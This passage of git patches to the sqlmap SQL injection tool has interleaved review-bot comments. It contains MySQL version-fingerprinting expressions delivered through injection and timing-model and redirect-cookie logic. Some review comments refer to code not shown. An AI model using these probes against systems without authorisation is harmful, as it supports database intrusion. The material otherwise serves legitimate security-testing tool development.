a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cf3cd30872fdf466ebad56e425c72376 lib/core/settings.py +76d92cc81e93bb60ee7f5948dea88678 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
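Review bot: Each `Set-Cookie` header value enters the loop whole, not split on `delimiter` the way the existing `Cookie` header is, so for `sid=abc; Path=/; HttpOnly` the code stores `cookies["sid"] = "abc; Path=/; HttpOnly"` and the follow-up request carries those attributes inside its `Cookie` header value. Keep only the name=value pair, as the removed code did: `for part in req.headers.get(HTTP_HEADER.COOKIE, "").split(delimiter) + [header.split(delimiter)[0] for header in headers.getheaders(HTTP_HEADER.SET_COOKIE)]:`. Separately, `Domain`, `Path` and `Secure` scoping of received cookies is not honored here, so a cookie set by the target is replayed to whatever host `redurl` names, including an off-site one; whether that is acceptable depends on how `redurl` is constrained earlier in `http_error_302`, which is outside the hunk, and deserves a comment either way.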
@@ -79,7 +79,7 @@ c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py +0d0567907afa2aa1493fb90ce09edfc0 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py From 38ea0686a84e580369d0b3ce8f627f000bfe0f35 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 22:48:43 +0200 Subject: [PATCH 189/428] Minor patch (Issue #3149) --- lib/core/settings.py | 2 +- lib/request/redirecthandler.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8096eb6f602..54095861025 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.39" +VERSION = "1.2.6.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 6d87937f288..6248ce3c1dc 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -134,7 +134,7 @@ def http_error_302(self, req, fp, code, msg, headers): cookies[key] = value last = key elif last: - cookies[key] += "%s%s" % (delimiter, part) + cookies[last] += "%s%s" % (delimiter, part) req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 19a6f867d6c..496a5948ed8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -76d92cc81e93bb60ee7f5948dea88678 lib/core/settings.py +da93a924f9a99c51cab7d8e7adb2448d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -79,7 +79,7 @@ c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -0d0567907afa2aa1493fb90ce09edfc0 lib/request/redirecthandler.py +3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py From e8336ecfe1e548f56672db31edcd7efa365058a3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 23:57:20 +0200 Subject: [PATCH 190/428] Fix of a pesky often 'statistical model' retrieval --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- lib/request/inject.py | 3 ++- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54095861025..47123a53380 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.40" +VERSION = "1.2.6.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index dcfd675a8fc..612970b4899 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1162,7 +1162,7 @@ def _randomizeParameter(paramString, randomParameter): singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") - warnMsg += "larger statistical model, please wait" + warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of") dataToStdout(warnMsg) while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: diff --git a/lib/request/inject.py b/lib/request/inject.py index 89cfbd0d455..34271e1dfe2 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -440,7 +440,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: - kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None + match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) + kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME 
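Review bot: The new `kb.responseTimeMode` regex drops the `(?i)` flag that the removed line had, so an expression written in lower case (e.g. `from ... order by` supplied via `--sql-query`) yields `None` and shares the default timing model instead of getting its own; keeping the flag costs nothing: `match = re.search(r"(?i)\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression)`. The greedy `.+` also means that with a subquery carrying its own `ORDER BY`, the outermost one is captured, which may be intended but is worth a one-line comment. `getValue` continues outside the hunk.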
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 496a5948ed8..a0d0c862758 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -da93a924f9a99c51cab7d8e7adb2448d lib/core/settings.py +2aab203a038a8c4d06794a9fdb878229 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -70,12 +70,12 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -1b5491cc079384f08cbc6b397786e1af lib/request/connect.py +039f0f7cf997856fa2f6e8d5d69f7ae9 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py +a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py From 4b4f728d8e7f6001ff09850e1c3ad689e3582757 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 10:58:25 +0200 Subject: [PATCH 191/428] Updated MySQL active fingerprint payloads --- lib/core/settings.py | 2 +- plugins/dbms/mysql/fingerprint.py | 23 +++++++++++++++++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 22 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 47123a53380..9cebb6fd486 100644 
--- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.41" +VERSION = "1.2.7.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 2e039532e27..ac9eabd967b 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -183,8 +183,15 @@ def checkDbms(self): # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 + # Determine if it is MySQL >= 8.0.0 + if inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"): + kb.data.has_information_schema = True + Backend.setVersion(">= 8.0.0") + setDbms("%s 8" % DBMS.MYSQL) + self.getBanner() + # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): + elif inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): kb.data.has_information_schema = True Backend.setVersion(">= 5.0.0") setDbms("%s 5" % DBMS.MYSQL) 
@@ -196,9 +203,17 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.MYSQL logger.info(infoMsg) - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") + # Check if it is MySQL >= 5.7 + if inject.checkBooleanExpression("ISNULL(JSON_QUOTE(NULL))"): + Backend.setVersion(">= 5.7") + + # Check if it is MySQL >= 5.6 + elif inject.checkBooleanExpression("ISNULL(VALIDATE_PASSWORD_STRENGTH(NULL))"): + Backend.setVersion(">= 5.6") + + # Check if it is MySQL >= 5.5 + elif inject.checkBooleanExpression("TO_SECONDS(950501)>0"): + Backend.setVersion(">= 5.5") # Check if it is MySQL >= 5.1.2 and < 5.5.0 elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a0d0c862758..c8a7bc6926a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2aab203a038a8c4d06794a9fdb878229 lib/core/settings.py +9e328a8f6e8e76c8d78779a8041d47c7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
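Review bot: The three new `Backend.setVersion` calls use two-component strings (`">= 5.7"`, `">= 5.6"`, `">= 5.5"`) while the surrounding code and the hunk above use three (`">= 5.0.0"`, `">= 8.0.0"`, and the removed `">= 5.5.0"`), so whatever later parses or prints the fingerprint sees mixed formats; I would keep `">= 5.7.0"` etc. unless the consumer is known to normalize. The `>= 5.7` probe relies on `JSON_QUOTE`, which to my recollection MariaDB 10.2+ also implements (not verifiable from this hunk), so a MariaDB backend may be reported as `MySQL >= 5.7`; a short comment noting that limitation next to the probe would help. The `elif` chain continues past the hunk.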
@@ -171,7 +171,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py -fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py From 48cd0421a6b7f03d26dd3087bd518c9ef66821ce Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:41:36 +0200 Subject: [PATCH 192/428] Trivial style update --- lib/core/settings.py | 2 +- sqlmap.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 9cebb6fd486..5cb20b4c6f8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.0" +VERSION = "1.2.7.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 62d850da396..1cbf6001d3b 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -325,7 +325,8 @@ def main(): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') + file_ = re.sub(r"\.\./", '/', file_) + file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8a7bc6926a..261995c131f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9e328a8f6e8e76c8d78779a8041d47c7 lib/core/settings.py +fecf20f279fc20930aa35b26df99c76d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py +0295b082969b4dc2f164090d8b0c73db sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From f92e1ebc40f5c415fa972427ece6b64a6b80a65e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:47:47 +0200 Subject: [PATCH 193/428] Another trivial style update --- lib/core/settings.py | 2 +- sqlmap.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5cb20b4c6f8..f573a687f2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.1" +VERSION = "1.2.7.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 1cbf6001d3b..98e5eeeaeb1 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -325,7 +325,10 @@ def main(): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_) + if "../" in file_: + file_ = re.sub(r"(\.\./)+", '/', file_) + else: + file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 261995c131f..83b910191f3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fecf20f279fc20930aa35b26df99c76d lib/core/settings.py +97ba609b383bae160c47d4b10b9f06a0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
@@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -0295b082969b4dc2f164090d8b0c73db sqlmap.py +e59b4cba325d0e5184dce300ef052728 sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 4660b816d57ffa0b3534435f95c181be503e120a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 11:54:12 +0200 Subject: [PATCH 194/428] Minor patch (fallback for masking of sensitive data) --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index aef46a15498..d747a42ef80 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3444,8 +3444,7 @@ def maskSensitiveData(msg): retVal = retVal.replace(value, '*' * len(value)) # Just in case (for problematic parameters regarding user encoding) - match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) - if match: + for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) if getpass.getuser(): diff --git a/lib/core/settings.py b/lib/core/settings.py index f573a687f2e..38beabae9b3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.2" +VERSION = "1.2.7.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
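Review bot: The `for match in re.finditer(...)` loop reassigns `retVal` while `finditer` is still walking the string object it was handed; this is safe only because the replacement is by value (`retVal.replace(match.group(3), ...)`) and the mask has the same length, so the precomputed offsets never go stale, and that deserves a comment: `# finditer() iterates the original string; replacing by value (same length) keeps offsets valid`. Because `str.replace` masks every occurrence of the captured text, a short captured value also blanks unrelated occurrences elsewhere in the message; a positional replacement using `match.span(3)` would be exact. The `'*' * len(value)` mask still reveals the length of the secret, which matters if the masked output is pasted into public reports. `maskSensitiveData` continues outside the hunk.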
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83b910191f3..9428342ee01 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -acec51826b280ad96dedbb56515e3988 lib/core/common.py +6c3ba41569f9403aef6cd9312fe9b96e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -97ba609b383bae160c47d4b10b9f06a0 lib/core/settings.py +0354f951a0f4711218323e16d32aa56f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From a424e4ab599cd80fd6ea54e828f2d72c7c4f2a9d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Jul 2018 13:09:25 +0200 Subject: [PATCH 195/428] Fixes #3168 --- lib/core/settings.py | 2 +- sqlmap.py | 6 ++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 38beabae9b3..de16dd5f473 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.3" +VERSION = "1.2.7.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/sqlmap.py b/sqlmap.py index 98e5eeeaeb1..f64e5e9ff84 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -273,6 +273,12 @@ def main(): logger.error(errMsg) raise SystemExit + elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")): + errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) " + errMsg += "(Reference: https://github.com/PyMySQL/PyMySQL/issues/700)" + logger.error(errMsg) + raise SystemExit + elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9428342ee01..b5a0c6d5800 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0354f951a0f4711218323e16d32aa56f lib/core/settings.py +af78e555614c7e1bf89c37271831b486 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -e59b4cba325d0e5184dce300ef052728 sqlmap.py +a35b5b83c12841fdf3925190c9d24299 sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 57be1856a6abdcdea6bdd289e0f0f6a8121046bc Mon Sep 17 00:00:00 2001 
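Review bot: The new error text reads `(=< 0.8.1)`, which is not a conventional comparison operator and will read as a typo to users; `errMsg = "please downgrade the 'PyMySQL' package (<= 0.8.1) "` is what is meant. Like its neighbouring branches the new one exits with a bare `raise SystemExit`, i.e. exit status 0 for what is a fatal configuration error, so wrapper scripts cannot detect the failure; that is a pre-existing convention in `main()`, but `raise SystemExit(1)` would be the correct signal if the convention is ever revisited. `main()` starts and ends outside the hunk.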
From: Miroslav Stampar Date: Thu, 5 Jul 2018 14:01:43 +0200 Subject: [PATCH 196/428] Where things could go kaboom (changing terminal coloring) --- lib/core/common.py | 6 +----- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 35 +++++++++++++++++++++++++++------ txt/checksum.md5 | 6 +++--- 4 files changed, 34 insertions(+), 15 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d747a42ef80..f060039e6c9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -884,11 +884,7 @@ def setColor(message, bold=False): retVal = colored(message, color=None, on_color=None, attrs=("bold",)) elif level: level = getattr(logging, level, None) if isinstance(level, basestring) else level - _ = LOGGER_HANDLER.level_map.get(level) - if _: - background, foreground, bold = _ - retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None) - + retVal = LOGGER_HANDLER.colorize(message, level) kb.stickyLevel = level if message and message[-1] != "\n" else None return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index de16dd5f473..873a5efc8ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.4" +VERSION = "1.2.7.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 9f3a6c5ec82..5ecc0596123 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py 
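Review bot: Replacing the `level_map` lookup with `LOGGER_HANDLER.colorize(message, level)` ties `setColor` to the handler's `is_tty` check (visible in the `colorize` hunk of `thirdparty/ansistrm/ansistrm.py` below: `if levelno in self.level_map and self.is_tty:`), whereas the removed code coloured via `colored()` regardless of the output stream; if that narrowing is intended, a comment such as `# colorize() leaves the message untouched when the handler stream is not a TTY` would make it explicit. The removed code also left `retVal` unchanged for an unknown level, so behaviour is preserved only if `retVal` was initialised to `message` above the hunk, which cannot be confirmed from here. `setColor` starts outside the hunk.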
